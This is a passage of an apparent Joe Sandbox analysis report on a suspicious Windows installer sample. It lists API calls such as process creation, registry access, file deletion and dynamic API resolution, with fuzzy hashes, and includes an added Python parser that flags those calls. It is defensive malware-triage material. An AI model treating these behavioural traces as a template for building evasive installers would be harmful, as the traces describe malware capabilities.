• Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
• Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
APIs
• GetDC.USER32(?), ref: 00402100
• GetDeviceCaps.GDI32(00000000), ref: 00402107
• MulDiv.KERNEL32(00000000,00000000), ref: 00402117
  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
• CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
Memory Dump Source
• Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
Similarity
• API ID: CapsCreateDeviceFontIndirectVersionwsprintf
• String ID:
• API String ID: 1599320355-0
• Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
• Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
• Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
• Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
APIs
  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
• lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
• lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
• lstrcpynW.KERNEL32(?,?,?), ref: 00407261
Memory Dump Source
• Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
Similarity
• API ID: lstrcpyn$CreateFilelstrcmp
• String ID: Version
• API String ID: 512980652-315105994
• Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
• Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
• Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
• Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
APIs
• DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
• GetTickCount.KERNEL32 ref: 00403303
• CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
• ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
Memory Dump Source
• Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
Similarity
• API ID: Window$CountCreateDestroyDialogParamShowTick
• String ID:
• API String ID: 2102729457-0
• Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
• Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
• Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
• Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
• GetProcAddress.KERNEL32(?,00000000), ref: 00406395
• GlobalFree.KERNEL32(00000000), ref: 0040639E
Memory Dump Source
• Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
• API String ID: 2883127279-0
• Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
• Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
• Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
• Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
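The records in this section are Joe Sandbox's per-function API, string and similarity listing. The Python below is an added example, not part of the report or of Joe Sandbox's own tooling: it parses records in this list format into structured data and flags the direct API calls a triage analyst would look at first, such as the GlobalAlloc / WideCharToMultiByte / GetProcAddress / GlobalFree sequence at 00406370 (dynamic API resolution) and the RegDeleteValueW call at 0040280E. The sample text is constructed from two records on this page with the extraction indentation removed; the labels in CAPABILITY_HINTS and the "anchor" key (lowest direct call-site address) are this example's own conventions and not Joe Sandbox fields.

```python
"""Parse Joe Sandbox per-function "APIs" / "Strings" / "Similarity" records and
flag capability-relevant API calls. Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: two records copied from this report. The "Memory Dump
# Source" block is identical for every record and is omitted here.
SAMPLE = r"""APIs
  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
• RegCloseKey.ADVAPI32(00000000), ref: 0040282E
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
Strings
• DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
• DeleteRegKey: "%s\%s", xrefs: 00402843
Similarity
• API ID: CloseDeleteOpenValuelstrlenwvsprintf
• String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
• API String ID: 1697273262-1764544995
• Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D
APIs
• GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
• GetProcAddress.KERNEL32(?,00000000), ref: 00406395
• GlobalFree.KERNEL32(00000000), ref: 0040639E
Similarity
• API ID: Global$AddressAllocByteCharFreeMultiProcWide
• String ID:
• API String ID: 2883127279-0
• Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "<api>.<module>(<args>), ref: <addr>"; the argument list and the
# "Part of subcall function" prefix are both optional in the report.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<via>[0-9A-F]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^(?P<text>.*), xrefs: (?P<xref>[0-9A-F]+)$")

# Assumption: these labels are this example's own triage hints, not Joe
# Sandbox signature names.
CAPABILITY_HINTS = {
    "GetProcAddress": "dynamic API resolution",
    "CreateProcessW": "process creation",
    "SHFileOperationW": "shell file operation",
    "RegDeleteValueW": "registry value deletion",
    "RegDeleteKeyW": "registry key deletion",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: str
    ref: str
    via: Optional[str] = None  # address of the subcall when listed indirectly


@dataclass
class FuncRecord:
    calls: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)

    def direct_calls(self):
        """Calls made by the function itself, not inherited from a subcall."""
        return [c for c in self.calls if c.via is None]

    @property
    def anchor(self):
        """Lowest direct call-site address, used as a stable key for the function."""
        return min(c.ref for c in self.direct_calls())


def parse_records(text):
    """Split report text at each "APIs" header and parse the bullet items."""
    records, section, current = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FuncRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        item = line[1:].strip()
        if section == "APIs":
            m = API_RE.match(item)
            if m:
                current.calls.append(ApiCall(m["api"], m["mod"], m["args"] or "", m["ref"], m["via"]))
        elif section == "Strings":
            m = STRING_RE.match(item)
            if m:
                current.strings.append((m["text"], m["xref"]))
        elif section == "Similarity":
            key, _, value = item.partition(":")
            current.similarity[key.strip()] = value.strip()
    return records


def flag_capabilities(records):
    """Map each function's anchor address to the hints its direct calls trigger."""
    flags = {}
    for rec in records:
        hits = []
        for call in rec.direct_calls():
            hint = CAPABILITY_HINTS.get(call.api)
            if hint and hint not in hits:
                hits.append(hint)
        flags[rec.anchor] = hits
    return flags


if __name__ == "__main__":
    for addr, hits in flag_capabilities(parse_records(SAMPLE)).items():
        print(addr, hits or "-")
```

Only direct calls feed the hints because Joe Sandbox repeats the "Part of subcall function" lines under every caller (the lstrlenW / wvsprintfW pair from 004062A3 appears in several records above), so a hint raised through a subcall would be attributed to every function that reaches it. The Instruction Fuzzy Hash kept in `similarity` is the field to key on when matching the same function across samples.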
APIs
• GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
• lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
Memory Dump Source
• Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
Similarity
• API ID: PrivateProfileStringlstrcmp
• String ID: !N~
• API String ID: 623250636-529124213
• Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
• Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
• Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
• Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                    APIs
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                    • CloseHandle.KERNEL32(?), ref: 00405C71
                                                    Strings
                                                    • Error launching installer, xrefs: 00405C48
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateHandleProcess
                                                    • String ID: Error launching installer
                                                    • API String ID: 3712363035-66219284
                                                    • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                    • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                    • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                    • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                    APIs
                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                    • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: CloseHandlelstrlenwvsprintf
                                                    • String ID: RMDir: RemoveDirectory invalid input("")
                                                    • API String ID: 3509786178-2769509956
                                                    • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                    • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                    • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                    • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                    APIs
                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                    • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                    • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                    • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                    • String ID:
                                                    • API String ID: 190613189-0
                                                    • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                    • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                    • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                    • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                    Execution Graph

                                                    Execution Coverage:4%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:2.2%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:99
99155->99152 99157 f54965 FindFirstFileW 99156->99157 99158 f54131 99156->99158 99157->99158 99159 f5497a FindClose 99157->99159 99158->98496 99159->99158 99161 ef4d37 84 API calls 99160->99161 99162 f6d203 99161->99162 99181 f6d24a Mailbox 99162->99181 99198 f6de8e 99162->99198 99164 f6d4a2 99165 f6d617 99164->99165 99169 f6d4b0 99164->99169 99249 f6dfb1 92 API calls Mailbox 99165->99249 99168 f6d626 99168->99169 99171 f6d632 99168->99171 99211 f6d057 99169->99211 99170 ef4d37 84 API calls 99189 f6d29b Mailbox 99170->99189 99171->99181 99176 f6d4e9 99226 f10e38 99176->99226 99179 f6d503 99233 f5a48d 89 API calls 4 library calls 99179->99233 99180 f6d51c 99234 ef47be 99180->99234 99181->98622 99184 f6d50e GetCurrentProcess TerminateProcess 99184->99180 99189->99164 99189->99170 99189->99181 99231 f5fc0d 59 API calls 2 library calls 99189->99231 99232 f6d6c8 61 API calls 2 library calls 99189->99232 99190 f6d68d 99190->99181 99194 f6d6a1 FreeLibrary 99190->99194 99191 f6d554 99246 f6dd32 107 API calls _free 99191->99246 99194->99181 99195 f6d565 99195->99190 99247 ef4230 59 API calls Mailbox 99195->99247 99248 ef523c 59 API calls 99195->99248 99250 f6dd32 107 API calls _free 99195->99250 99199 f01aa4 59 API calls 99198->99199 99200 f6dea9 CharLowerBuffW 99199->99200 99251 f4f903 99200->99251 99204 f01207 59 API calls 99205 f6dee2 99204->99205 99206 f01462 59 API calls 99205->99206 99208 f6def9 99206->99208 99207 f6df41 Mailbox 99207->99189 99209 f01981 59 API calls 99208->99209 99210 f6df05 Mailbox 99209->99210 99210->99207 99258 f6d6c8 61 API calls 2 library calls 99210->99258 99212 f6d072 99211->99212 99216 f6d0c7 99211->99216 99213 f10fe6 Mailbox 59 API calls 99212->99213 99215 f6d094 99213->99215 99214 f10fe6 Mailbox 59 API calls 99214->99215 99215->99214 99215->99216 99217 f6e139 99216->99217 99218 f6e362 Mailbox 99217->99218 99222 f6e15c _strcat _wcscpy __wsetenvp 99217->99222 99218->99176 99219 ef50d5 59 API calls 99219->99222 99220 ef502b 59 API calls 
99220->99222 99221 ef5087 59 API calls 99221->99222 99222->99218 99222->99219 99222->99220 99222->99221 99223 f1593c 58 API calls _W_store_winword 99222->99223 99224 ef4d37 84 API calls 99222->99224 99259 f55e42 61 API calls 2 library calls 99222->99259 99223->99222 99224->99222 99227 f10e4d 99226->99227 99228 f10ee5 CreateProcessW 99227->99228 99229 f10ed3 CloseHandle 99227->99229 99230 f10eb3 99227->99230 99228->99230 99229->99230 99230->99179 99230->99180 99231->99189 99232->99189 99233->99184 99235 ef47c6 99234->99235 99236 f10fe6 Mailbox 59 API calls 99235->99236 99237 ef47d4 99236->99237 99238 ef47e0 99237->99238 99260 ef46ec 59 API calls Mailbox 99237->99260 99240 ef4540 99238->99240 99261 ef4650 99240->99261 99242 ef454f 99243 f10fe6 Mailbox 59 API calls 99242->99243 99244 ef45eb 99242->99244 99243->99244 99244->99195 99245 ef4230 59 API calls Mailbox 99244->99245 99245->99191 99246->99195 99247->99195 99248->99195 99249->99168 99250->99195 99252 f4f92e __wsetenvp 99251->99252 99253 f4f96d 99252->99253 99256 f4f963 99252->99256 99257 f4fa14 99252->99257 99253->99204 99253->99210 99254 f014db 61 API calls 99254->99256 99255 f014db 61 API calls 99255->99257 99256->99253 99256->99254 99257->99253 99257->99255 99258->99207 99259->99222 99260->99238 99262 ef4659 Mailbox 99261->99262 99263 f2d6ec 99262->99263 99268 ef4663 99262->99268 99264 f10fe6 Mailbox 59 API calls 99263->99264 99266 f2d6f8 99264->99266 99265 ef466a 99265->99242 99266->99266 99268->99265 99269 ef5190 59 API calls Mailbox 99268->99269 99269->99268 99271 f01207 59 API calls 99270->99271 99272 f54024 99271->99272 99273 f01207 59 API calls 99272->99273 99274 f5402d 99273->99274 99275 f01207 59 API calls 99274->99275 99276 f54036 99275->99276 99277 f10284 60 API calls 99276->99277 99278 f54041 99277->99278 99279 f54fec GetFileAttributesW 99278->99279 99280 f5404a 99279->99280 99281 f5405c 99280->99281 99282 f01900 59 API calls 99280->99282 99283 f10119 59 API calls 99281->99283 99282->99281 99284 
f54070 FindFirstFileW 99283->99284 99285 f540fc FindClose 99284->99285 99288 f5408f 99284->99288 99290 f54107 Mailbox 99285->99290 99286 f540d7 FindNextFileW 99286->99288 99287 f01c9c 59 API calls 99287->99288 99288->99285 99288->99286 99288->99287 99289 f017e0 59 API calls 99288->99289 99291 f01900 59 API calls 99288->99291 99289->99288 99290->98627 99292 f540c8 DeleteFileW 99291->99292 99292->99286 99293 f540f3 FindClose 99292->99293 99293->99290 99294->98647 99295->98645 99297 f6a970 99296->99297 99298 f6a918 99296->99298 99297->98674 99299 f10fe6 Mailbox 59 API calls 99298->99299 99302 f6a93a 99299->99302 99300 f10fe6 Mailbox 59 API calls 99300->99302 99302->99297 99302->99300 99328 f4715b 59 API calls Mailbox 99302->99328 99304 f578e3 99303->99304 99305 f578ac 99303->99305 99307 f46ebc 99304->99307 99305->99304 99306 f10fe6 Mailbox 59 API calls 99305->99306 99306->99304 99308 f46f06 99307->99308 99309 f46f1c Mailbox 99307->99309 99310 f01a36 59 API calls 99308->99310 99311 f46f47 99309->99311 99313 f46f5a 99309->99313 99310->99309 99312 f6c355 299 API calls 99311->99312 99319 f46f53 99312->99319 99314 efa820 299 API calls 99313->99314 99317 f46f91 99314->99317 99316 f47002 99316->98676 99318 f46fdc 99317->99318 99317->99319 99321 f46fc1 99317->99321 99318->99319 99334 f5a48d 89 API calls 4 library calls 99318->99334 99335 f46cf1 59 API calls Mailbox 99319->99335 99329 f4706d 99321->99329 99323->98676 99324->98685 99325->98690 99326->98702 99327->98706 99328->99302 99330 f47085 99329->99330 99336 f6495b 99330->99336 99345 f6f1b2 99330->99345 99331 f470d9 99331->99319 99334->99319 99335->99316 99337 f10fe6 Mailbox 59 API calls 99336->99337 99338 f6496c 99337->99338 99350 f0433f 99338->99350 99341 ef4d37 84 API calls 99342 f6498d GetEnvironmentVariableW 99341->99342 99353 f57a51 59 API calls Mailbox 99342->99353 99344 f649aa 99344->99331 99346 ef4d37 84 API calls 99345->99346 99347 f6f1cf 99346->99347 99348 f54148 66 API calls 99347->99348 99349 f6f1de 
99348->99349 99349->99331 99351 f10fe6 Mailbox 59 API calls 99350->99351 99352 f04351 99351->99352 99352->99341 99353->99344 99355 f54d09 99354->99355 99359 f54cf0 99354->99359 99361 f137c3 59 API calls __wcstoi64 99355->99361 99358 f54d0f 99358->98719 99359->99355 99359->99358 99360 f1385c GetStringTypeW _iswctype 99359->99360 99360->99359 99361->99358 99362 f17e83 99363 f17e8f __wsopen_helper 99362->99363 99399 f1a038 GetStartupInfoW 99363->99399 99365 f17e94 99401 f18dac GetProcessHeap 99365->99401 99367 f17eec 99368 f17ef7 99367->99368 99484 f17fd3 58 API calls 3 library calls 99367->99484 99402 f19d16 99368->99402 99371 f17efd 99372 f17f08 __RTC_Initialize 99371->99372 99485 f17fd3 58 API calls 3 library calls 99371->99485 99423 f1d802 99372->99423 99375 f17f17 99376 f17f23 GetCommandLineW 99375->99376 99486 f17fd3 58 API calls 3 library calls 99375->99486 99442 f25153 GetEnvironmentStringsW 99376->99442 99379 f17f22 99379->99376 99382 f17f3d 99383 f17f48 99382->99383 99487 f132e5 58 API calls 3 library calls 99382->99487 99452 f24f88 99383->99452 99386 f17f4e 99387 f17f59 99386->99387 99488 f132e5 58 API calls 3 library calls 99386->99488 99466 f1331f 99387->99466 99390 f17f61 99392 f17f6c __wwincmdln 99390->99392 99489 f132e5 58 API calls 3 library calls 99390->99489 99472 f05f8b 99392->99472 99394 f17f80 99395 f17f8f 99394->99395 99490 f13588 58 API calls _doexit 99394->99490 99491 f13310 58 API calls _doexit 99395->99491 99398 f17f94 __wsopen_helper 99400 f1a04e 99399->99400 99400->99365 99401->99367 99492 f133b7 36 API calls 2 library calls 99402->99492 99404 f19d1b 99493 f19f6c InitializeCriticalSectionAndSpinCount __mtinitlocks 99404->99493 99406 f19d20 99407 f19d24 99406->99407 99495 f19fba TlsAlloc 99406->99495 99494 f19d8c 61 API calls 2 library calls 99407->99494 99410 f19d29 99410->99371 99411 f19d36 99411->99407 99412 f19d41 99411->99412 99496 f18a05 99412->99496 99415 f19d83 99504 f19d8c 61 API calls 2 library calls 99415->99504 99418 f19d88 
